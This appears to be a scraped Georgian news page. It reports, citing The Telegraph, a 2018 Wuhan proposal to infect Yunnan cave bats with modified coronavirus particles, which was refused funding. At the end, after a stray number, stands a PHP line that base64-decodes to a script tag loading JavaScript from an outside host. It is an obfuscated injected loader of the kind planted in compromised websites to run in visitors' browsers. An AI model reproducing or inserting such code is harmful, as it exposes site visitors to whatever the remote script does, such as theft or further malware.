celsiusi
ავერსი შნაიდერი
ჩინეთის ქალაქ უხანში მომუშავე მეცნიერები 2018 წელს გამოქვაბულში მცხოვრები ღამურების ინფიცირებას მოდიფიცირებული კორონავირუსით გეგმავდნენ. ამის შესახებ ინფორმაციას ბრიტანული გამოცემა, „ტელეგრაფი“ შესაბამის დოკუმენტებზე დაყრდნობით ავრცელებს.
 
როგორც გამოცემა აღნიშნავს, მეცნიერებმა შეიტანეს მოთხოვნა პროექტისთვის 14 მილიონ დოლარზე მინიმუმ 18 თვით ადრე „კოვიდ 19“-ის გავრცელების ოფიციალურ შეტყობინებამდე.
 
მეცნიერებს სურდათ, ცხოველების კანში შეეტანათ კორონავირუსების „ნანონაწილაკები, რომლებიც შეიცავს ახალ ქიმერულ ცილოვან ცილებს.“ ამის გაკეთება ჩინეთის პროვინციის იუნანის გამოქვაბულებში იყო დაგეგმილი.
 
ჩინელ მეცნიერებს უარი ეთქვათ ასეთი პროექტის დაფინანსებაზე, რადგან მას „შეეძლო ადგილობრივი მოსახლეობა საფრთხეში ჩაეგდო“, იმისდა მიუხედავად, რომ მკვლევარებმა პირობა დადეს, რომ ჩაატარებდნენ საგანმანათლებლო ღონისძიებებს თავიანთი მუშაობის შესახებ.
 
ჩინეთის ხელისუფლებამ ჯანდაცვის მსოფლიო ორგანიზაციას უხანში უცნობი პნევმონიის აფეთქების შესახებ 2019 წლის 31 დეკემბერს აცნობა.
1018
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");